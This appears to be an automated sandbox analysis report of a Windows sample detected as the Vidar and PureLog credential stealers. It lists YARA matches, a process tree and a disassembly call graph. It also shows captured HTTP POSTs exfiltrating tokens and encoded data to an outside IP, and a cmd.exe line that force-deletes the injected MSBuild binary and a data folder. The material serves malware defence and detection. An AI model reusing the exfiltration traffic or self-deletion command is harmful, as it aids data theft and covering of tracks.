                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.44976778.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:37 UTC281OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 130769
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------AKECBFBAEBKJJJJKFCGCCont
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 47 36 72 4e 72 2f 41 4d 65 55 48 2f 58 4e 66 35 56 4b 4c 75 52 4e 54 74 62 54 61 44 48 4c 42 4a 4a 6e 48 4f 56 5a 52 31 2f 34 45 50 7a 39 71 2f 4c 71 48 76 56 4a 52 65 33 2f 41 41 54 39 61 68 38 43 30 76 70 2b 67 31 52 47 59 6f 35 2f 4b 58 79 58 41 50 6d 52 79 46 75 43 4d 37 75 52 30 72 6d 76 45 58 67 32 7a 53 31 76 74 55 6a 75 5a 78 4b 46 61 55 6f 32 43 70 50 58 30 72 71 4c 5a 58 67 6d 75 72 52 47 58 61 72 4c 4c 48 6b 5a 43 71 35 4f 52 2f 33 30 72 66 67 52 36 56 54 31 68 58 6a 38 4d 36 72 45 37 68 76 4c 6a 63 4b 51 4d 63 62 51 63 64 54 30 7a 69 76 59 77 44 64 47 71 70 55 74 47 39 48 62 31 50 4d 7a 4b 6a 43 72 53 6c 47 6f 72 70 4b 36 2b 34 38 67 6f 6f 6f 72 37 6b 2f 4f 41 6f 4e 46 46 41 43 56 36 48 38 4c 76 2b 52 66 31 44 2f 73 49 79 66 2b 67 4a 58 6e 75
                                                                                        Data Ascii: G6rNr/AMeUH/XNf5VKLuRNTtbTaDHLBJJnHOVZR1/4EPz9q/LqHvVJRe3/AAT9ah8C0vp+g1RGYo5/KXyXAPmRyFuCM7uR0rmvEXg2zS1vtUjuZxKFaUo2CpPX0rqLZXgmurRGXarLLHkZCq5OR/30rfgR6VT1hXj8M6rE7hvLjcKQMcbQcdT0zivYwDdGqpUtG9Hb1PMzKjCrSlGorpK6+48gooor7k/OAoNFFACV6H8Lv+Rf1D/sIyf+gJXnu
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 65 65 64 55 50 71 71 78 4f 71 2f 6f 42 58 54 2f 77 42 73 32 48 2f 51 54 30 66 2f 41 4d 4b 32 66 2f 34 6d 73 44 77 54 34 4a 38 51 36 56 34 75 73 37 2b 2f 73 52 44 62 78 65 59 58 63 7a 49 33 56 47 55 63 42 69 65 70 72 31 32 76 50 78 74 57 6e 47 6f 6c 44 56 4a 4a 61 50 74 66 73 64 65 48 70 79 6c 42 75 57 6a 75 2b 6e 6f 63 52 71 6c 7a 44 64 65 41 4e 53 65 47 65 32 6d 55 54 49 43 31 76 71 4c 33 71 67 37 34 2b 4e 37 41 45 48 2f 5a 2f 48 76 58 6e 48 4e 65 76 65 4e 76 2b 52 51 76 76 72 48 2f 41 4f 6a 46 72 79 4b 76 51 79 65 56 34 7a 66 6d 65 42 78 43 72 56 4b 61 38 68 4b 4b 4b 4b 39 6b 2b 65 43 69 69 69 67 42 4b 4b 57 69 67 59 43 69 69 69 67 41 4e 4a 53 30 6c 41 42 53 47 6c 6f 6f 41 53 69 69 69 67 41 6f 6f 6f 6f 47 4a 52 53 6d 6b 6f 41 53 69 6c 70 4d 55 77 43 6b
                                                                                        Data Ascii: eedUPqqxOq/oBXT/wBs2H/QT0f/AMK2f/4msDwT4J8Q6V4us7+/sRDbxeYXczI3VGUcBiepr12vPxtWnGolDVJJaPtfsdeHpylBuWju+nocRqlzDdeANSeGe2mUTIC1vqL3qg74+N7AEH/Z/HvXnHNeveNv+RQvvrH/AOjFryKvQyeV4zfmeBxCrVKa8hKKKK9k+eCiiigBKKWigYCiiigANJS0lABSGlooASiiigAooooGJRSmkoASilpMUwCk
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 62 4c 61 71 5a 32 64 53 30 35 66 62 47 51 4d 4a 7a 36 45 45 35 36 6e 50 74 56 30 64 4b 39 4f 6c 55 35 34 33 74 62 31 50 45 72 55 76 5a 79 35 65 5a 50 30 43 69 69 69 74 44 49 44 53 55 70 70 4b 41 43 69 69 69 67 59 6e 4e 4c 52 52 51 41 55 6d 4b 57 69 67 42 4b 4b 4b 4b 42 68 53 55 74 46 41 43 55 55 55 55 41 46 4a 51 61 4b 59 77 6f 6f 6f 70 67 46 46 46 48 65 67 42 4b 4b 57 6b 70 44 43 6b 70 61 4b 59 43 55 55 47 69 67 41 70 4b 57 6a 46 41 78 4b 53 6e 55 6c 41 43 55 55 75 4b 54 46 4d 4c 68 33 70 4b 58 46 47 4b 4c 6a 45 6f 70 61 53 69 34 43 55 55 74 4a 54 41 4b 4d 55 55 55 44 45 6f 70 61 53 6d 41 55 6c 4c 52 51 4d 53 69 69 69 67 42 4b 44 52 53 6d 6d 41 6c 46 42 6f 46 41 77 70 44 53 30 55 41 4a 52 52 52 7a 54 47 46 46 46 46 4d 42 4f 31 46 4c 53 55 41 4a 52 6d 69
                                                                                        Data Ascii: bLaqZ2dS05fbGQMJz6EE56nPtV0dK9OlU543tb1PErUvZy5eZP0CiiitDIDSUppKACiiigYnNLRRQAUmKWigBKKKKBhSUtFACUUUUAFJQaKYwooopgFFFHegBKKWkpDCkpaKYCUUGigApKWjFAxKSnUlACUUuKTFMLh3pKXFGKLjEopaSi4CUUtJTAKMUUUDEopaSmAUlLRQMSiiigBKDRSmmAlFBoFAwpDS0UAJRRRzTGFFFFMBO1FLSUAJRmi
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 59 66 65 6c 62 33 70 70 4e 53 32 61 49 4f 39 49 54 6e 4e 47 65 65 6c 49 61 6c 6c 43 48 67 5a 7a 2b 46 4a 32 7a 53 6e 2f 4a 70 4f 33 53 6f 62 4b 51 32 6b 49 77 4f 6c 4c 52 53 47 4e 7a 52 32 70 61 62 6d 6b 4d 57 6d 2b 39 4b 61 51 30 68 6f 51 30 6e 31 70 53 44 6e 31 39 4b 54 70 53 4b 45 78 36 39 4b 4f 31 48 34 55 48 6f 61 42 6f 39 41 6f 6f 78 52 57 42 38 6d 48 54 6d 71 76 68 71 39 65 58 57 62 79 4d 73 63 43 4d 6e 48 2f 41 68 56 6f 39 44 57 54 34 57 2b 58 58 62 34 6e 76 47 52 2b 6f 72 79 4d 7a 62 55 36 64 6a 36 72 68 31 4a 30 61 37 66 6c 2b 70 5a 38 52 61 74 4c 39 73 61 7a 68 6b 5a 49 30 2b 2f 67 34 33 47 73 6a 53 74 66 65 32 76 74 73 30 6a 4e 61 74 78 67 6e 4f 30 2b 6f 71 76 34 69 6c 4b 61 78 64 52 66 78 46 79 53 66 59 38 31 7a 39 31 68 6e 74 59 38 34 57 53
                                                                                        Data Ascii: Yfelb3ppNS2aIO9ITnNGeelIallCHgZz+FJ2zSn/JpO3SobKQ2kIwOlLRSGNzR2pabmkMWm+9KaQ0hoQ0n1pSDn19KTpSKEx69KO1H4UHoaBo9AooxRWB8mHTmqvhq9eXWbyMscCMnH/AhVo9DWT4W+XXb4nvGR+oryMzbU6dj6rh1J0a7fl+pZ8RatL9sazhkZI0+/g43GsjStfe2vts0jNatxgnO0+oqv4ilKaxdRfxFySfY81z91hntY84WS
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 76 53 37 53 43 79 75 4c 4f 31 67 76 4c 2b 7a 38 35 5a 42 69 58 7a 47 77 49 33 4f 57 59 5a 35 41 34 41 47 52 69 6c 4f 70 33 45 39 35 71 6d 6c 32 4e 70 61 32 75 6f 78 33 30 2b 4c 4f 2b 52 4a 44 50 44 74 79 69 52 53 59 59 49 34 77 33 41 4b 35 33 44 44 45 67 43 73 76 37 58 70 74 36 52 2f 72 54 2f 41 44 4e 33 77 37 57 53 54 63 31 2f 56 2f 38 41 49 32 4b 4b 7a 4a 39 53 62 2b 7a 76 4b 69 66 54 35 6d 58 52 37 4f 35 46 74 42 41 45 75 49 57 59 52 6c 35 6e 6b 4b 44 63 76 7a 45 59 44 4d 54 76 48 41 77 53 4e 42 54 75 68 55 2b 71 39 36 36 38 4c 69 34 34 6a 6d 73 72 57 50 4f 78 2b 58 54 77 66 4c 7a 4f 2f 4e 2f 58 36 6a 36 4b 6f 61 6c 72 46 7a 61 61 63 73 44 52 57 44 54 33 37 4b 6b 42 46 6e 45 48 68 67 42 77 38 78 59 4a 75 79 54 38 6f 35 37 4d 66 51 30 38 36 68 4e 4c 71
                                                                                        Data Ascii: vS7SCyuLO1gvL+z85ZBiXzGwI3OWYZ5A4AGRilOp3E95qml2Npa2uox30+LO+RJDPDtyiRSYYI4w3AK53DDEgCsv7Xpt6R/rT/ADN3w7WSTc1/V/8AI2KKzJ9Sb+zvKifT5mXR7O5FtBAEuIWYRl5nkKDcvzEYDMTvHAwSNBTuhU+q9668Li44jmsrWPOx+XTwfLzO/N/X6j6KoalrFzaacsDRWDT37KkBFnEHhgBw8xYJuyT8o57MfQ086hNLq
                                                                                        2024-05-24 08:27:37 UTC16355OUTData Raw: 70 53 55 68 67 4d 59 39 71 54 4e 4b 65 6c 4a 6d 67 59 44 67 65 31 4a 37 30 76 4e 4a 6e 2f 4a 70 67 48 58 36 65 39 49 63 34 36 55 70 36 39 61 51 6d 6b 4d 54 36 30 55 76 57 6b 36 39 71 59 78 44 31 6f 36 64 4f 50 70 53 2f 53 6b 37 2f 34 55 44 50 52 4b 4b 4b 4b 7a 50 6b 51 6f 72 52 30 62 53 57 31 69 37 6b 74 31 6c 45 5a 53 4d 79 5a 4b 35 7a 67 67 59 36 2b 39 61 6e 2f 43 4a 45 4d 56 61 38 49 49 36 67 78 66 2f 58 72 7a 63 56 6d 32 44 77 6b 2f 5a 31 70 32 66 6f 33 2b 53 50 53 77 75 55 59 33 46 30 2f 61 55 59 58 58 71 6c 2b 62 4f 61 6f 72 71 42 34 50 7a 2f 79 2f 2f 77 44 6b 48 2f 37 4b 6f 4e 53 38 4d 66 32 66 70 30 74 33 39 73 38 7a 79 38 66 4c 35 57 4d 35 49 48 58 50 76 57 56 4c 50 63 76 71 7a 56 4f 46 53 37 62 73 74 4a 62 76 35 47 74 58 49 63 77 70 51 64 53 64
                                                                                        Data Ascii: pSUhgMY9qTNKelJmgYDge1J70vNJn/JpgHX6e9Ic46Up69aQmkMT60UvWk69qYxD1o6dOPpS/Sk7/4UDPRKKKKzPkQorR0bSW1i7kt1lEZSMyZK5zggY6+9an/CJEMVa8II6gxf/XrzcVm2Dwk/Z1p2fo3+SPSwuUY3F0/aUYXXql+bOaorqB4Pz/y//wDkH/7KoNS8Mf2fp0t39s8zy8fL5WM5IHXPvWVLPcvqzVOFS7bstJbv5GtXIcwpQdSd
                                                                                        2024-05-24 08:27:37 UTC16284OUTData Raw: 63 37 63 5a 37 48 38 71 67 38 35 44 47 30 6f 4f 59 31 77 47 63 41 37 52 6e 4f 4d 6e 74 6e 42 2f 4b 75 53 74 68 63 4e 57 71 77 72 50 34 6f 37 50 2b 75 68 32 55 63 54 69 71 46 4b 64 42 4a 38 73 74 30 31 2f 57 70 4c 53 56 4b 31 76 63 70 46 46 49 39 6e 64 4c 48 4e 6a 79 6e 4d 44 37 58 79 4d 2f 4b 63 59 50 41 4a 34 71 74 35 38 66 6c 47 58 64 2b 37 42 43 6c 2b 77 4a 7a 67 5a 39 65 44 2b 56 64 61 71 51 65 7a 4f 52 30 71 69 33 69 2f 75 4a 4b 58 4e 4c 63 78 79 32 66 6c 2f 61 34 4a 37 66 7a 50 39 58 35 30 54 4a 76 38 41 70 6b 63 39 65 31 4f 6e 67 6e 74 4a 46 6a 75 72 65 65 33 64 77 53 71 7a 52 4d 68 59 44 30 79 42 6d 68 56 49 50 5a 67 36 4e 52 58 62 69 39 50 49 6a 6f 6f 6f 71 7a 4d 57 6d 75 4d 6f 77 48 63 55 76 49 6b 6a 54 61 2b 2b 55 41 78 72 74 4f 58 42 4f 42 74
                                                                                        Data Ascii: c7cZ7H8qg85DG0oOY1wGcA7RnOMntnB/KuSthcNWqwrP4o7P+uh2UcTiqFKdBJ8st01/WpLSVK1vcpFFI9ndLHNjynMD7XyM/KcYPAJ4qt58flGXd+7BCl+wJzgZ9eD+VdaqQezOR0qi3i/uJKXNLcxy2fl/a4J7fzP9X50TJv8Apkc9e1OngntJFjuree3dwSqzRMhYD0yBmhVIPZg6NRXbi9PIjoooqzMWmuMowHcUvIkjTa++UAxrtOXBOBt
                                                                                        2024-05-24 08:27:38 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.44976878.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:39 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGI
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:39 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 4b 45 48 49 4a 45 43 47 43 42 46 49 4a 45 47 49 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------FBKJKEHIJECGCBFIJEGIContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------FBKJKEHIJECGCBFIJEGICont
                                                                                        2024-05-24 08:27:40 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:04:26:59
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe"
                                                                                        Imagebase:0x5a0000
                                                                                        File size:5'039'032 bytes
                                                                                        MD5 hash:3D5D6485AF7CD75F9CB1284A35E70F97
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:04:26:59
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                        Imagebase:0x980000
                                                                                        File size:262'432 bytes
                                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:04:27:00
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096
                                                                                        Imagebase:0x8a0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:04:27:41
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exit
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:04:27:41
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:04:27:41
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 10
                                                                                        Imagebase:0xe20000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:7.4%
                                                                                          Dynamic/Decrypted Code Coverage:12.6%
                                                                                          Signature Coverage:6%
                                                                                          Total number of Nodes:1192
                                                                                          Total number of Limit Nodes:55
                                                                                          execution_graph 58005 6d016bc0 58006 6d016bde 58005->58006 58007 6d016c26 58006->58007 58015 6d069d21 58006->58015 58009 6d016bf7 58010 6d016c1d 58009->58010 58019 6d015300 58009->58019 58014 6d016c3c 58016 6d06e8d5 __EH_prolog3_catch 58015->58016 58027 6d069bb5 58016->58027 58018 6d06e8ed _Fac_tidy 58018->58009 58021 6d015322 58019->58021 58020 6d015329 58020->58010 58023 6d016c60 SafeArrayCreateVector SafeArrayAccessData 58020->58023 58021->58020 58068 6d015840 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 58021->58068 58024 6d016c91 _memmove 58023->58024 58025 6d016cad 58023->58025 58026 6d016c9f SafeArrayUnaccessData 58024->58026 58025->58014 58026->58025 58029 6d069bbf 58027->58029 58030 6d069bd9 58029->58030 58033 6d069bdb std::exception::exception 58029->58033 58039 6d069d66 58029->58039 58056 6d06c86e DecodePointer 58029->58056 58030->58018 58037 6d069c19 58033->58037 58057 6d069af4 76 API calls __cinit 58033->58057 58034 6d069c23 58059 6d06ac75 RaiseException 58034->58059 58058 6d0695c1 66 API calls std::exception::operator= 58037->58058 58038 6d069c34 58040 6d069de3 58039->58040 58051 6d069d74 58039->58051 58066 6d06c86e DecodePointer 58040->58066 58042 6d069de9 58067 6d06d7d8 66 API calls __getptd_noexit 58042->58067 58045 6d069da2 RtlAllocateHeap 58045->58051 58055 6d069ddb 58045->58055 58047 6d069dcf 58064 6d06d7d8 66 API calls __getptd_noexit 58047->58064 58051->58045 58051->58047 58052 6d069dcd 58051->58052 58053 6d069d7f 58051->58053 58063 6d06c86e DecodePointer 58051->58063 58065 6d06d7d8 66 API calls __getptd_noexit 58052->58065 58053->58051 58060 6d06d74e 66 API calls __NMSG_WRITE 58053->58060 58061 6d06d59f 66 API calls 6 library calls 58053->58061 58062 6d06d279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 58053->58062 58055->58029 58056->58029 58057->58037 58058->58034 58059->58038 58060->58053 58061->58053 58063->58051 58064->58052 58065->58055 58066->58042 58067->58055 58068->58020 58069 2ebafe8 58070 2ebafff 58069->58070 58071 2ebb006 58069->58071 58070->58071 58074 5431839 58070->58074 58079 5431848 58070->58079 58076 5431848 58074->58076 58075 5431876 58075->58071 58076->58075 58084 5431dd0 58076->58084 58092 5431dbf 58076->58092 58080 5431876 58079->58080 58081 543186c 58079->58081 58080->58071 58081->58080 58082 5431dd0 328 API calls 58081->58082 58083 5431dbf 328 API calls 58081->58083 58082->58080 58083->58080 58085 5431df7 58084->58085 58100 5431e78 58085->58100 58105 5431e88 58085->58105 58086 5431e2b 58110 54325d1 58086->58110 58114 54325d8 58086->58114 58087 5431e6a 58087->58075 58093 5431dd0 58092->58093 58096 5431e78 LoadLibraryW 58093->58096 58097 5431e88 LoadLibraryW 58093->58097 58094 5431e2b 58098 54325d1 327 API calls 58094->58098 58099 54325d8 327 API calls 58094->58099 58095 5431e6a 58095->58075 58096->58094 58097->58094 58098->58095 58099->58095 58101 5431e88 58100->58101 58118 5431ed8 58101->58118 58122 5431ee8 58101->58122 58102 5431ead 58102->58086 58106 5431ea2 58105->58106 58108 5431ed8 LoadLibraryW 58106->58108 58109 5431ee8 LoadLibraryW 58106->58109 58107 5431ead 58107->58086 58108->58107 58109->58107 58111 54325d8 58110->58111 58130 6d032ed0 58111->58130 58112 5432663 58112->58087 58115 543261c 58114->58115 58117 6d032ed0 327 API calls 58115->58117 58116 5432663 58116->58087 58117->58116 58121 5431ee8 58118->58121 58119 5432081 58119->58102 58121->58119 58126 5430510 58121->58126 58123 5431f04 58122->58123 58124 5432081 58123->58124 58125 5430510 LoadLibraryW 58123->58125 58124->58102 58125->58123 58127 54320a0 LoadLibraryW 58126->58127 58129 543214c 58127->58129 58129->58121 58131 6d032f09 58130->58131 58151 6d033006 moneypunct 58130->58151 58132 6d069bb5 77 API calls 58131->58132 58133 6d032f31 58132->58133 58134 6d069bb5 77 API calls 58133->58134 58135 6d032f54 58134->58135 58152 6d015050 58135->58152 58137 6d032f6e 58138 6d069bb5 77 API calls 58137->58138 58139 6d032f75 58138->58139 58140 6d015050 77 API calls 58139->58140 58141 6d032f8f 58140->58141 58142 6d069bb5 77 API calls 58141->58142 58143 6d032f96 58142->58143 58144 6d015050 77 API calls 58143->58144 58145 6d032fb0 58144->58145 58146 6d069bb5 77 API calls 58145->58146 58147 6d032fb7 58146->58147 58148 6d015050 77 API calls 58147->58148 58149 6d032fd1 58148->58149 58160 6d0116b0 58149->58160 58151->58112 58153 6d01505d 58152->58153 58154 6d015091 58152->58154 58153->58154 58156 6d015066 58153->58156 58155 6d01509d 58154->58155 58225 6d015110 77 API calls std::_Xinvalid_argument 58154->58225 58155->58137 58157 6d01507a 58156->58157 58224 6d015110 77 API calls std::_Xinvalid_argument 58156->58224 58157->58137 58161 6d069bb5 77 API calls 58160->58161 58162 6d011706 58161->58162 58163 6d011711 58162->58163 58164 6d011c39 58162->58164 58226 6d012d70 58163->58226 58278 6d069533 66 API calls std::exception::_Copy_str 58164->58278 58167 6d011c48 58279 6d06ac75 RaiseException 58167->58279 58170 6d011c5d 58171 6d012d70 77 API calls 58172 6d011788 58171->58172 58173 6d012d70 77 API calls 58172->58173 58174 6d0117a9 58173->58174 58175 6d012d70 77 API calls 58174->58175 58176 6d0117ca 58175->58176 58177 6d012d70 77 API calls 58176->58177 58178 6d0117e6 58177->58178 58179 6d012d70 77 API calls 58178->58179 58180 6d01182f 58179->58180 58181 6d012d70 77 API calls 58180->58181 58182 6d011878 58181->58182 58183 6d012d70 77 API calls 58182->58183 58184 6d0118c6 58183->58184 58185 6d012d70 77 API calls 58184->58185 58186 6d0118e7 58185->58186 58187 6d012d70 77 API calls 58186->58187 58188 6d011900 58187->58188 58189 6d012d70 77 API calls 58188->58189 58190 6d011946 58189->58190 58191 6d012d70 77 API calls 58190->58191 58192 6d01198f 58191->58192 58193 6d012d70 77 API calls 58192->58193 58194 6d0119d3 58193->58194 58195 6d012d70 77 API calls 58194->58195 58196 6d011a05 58195->58196 58234 6d013b30 58196->58234 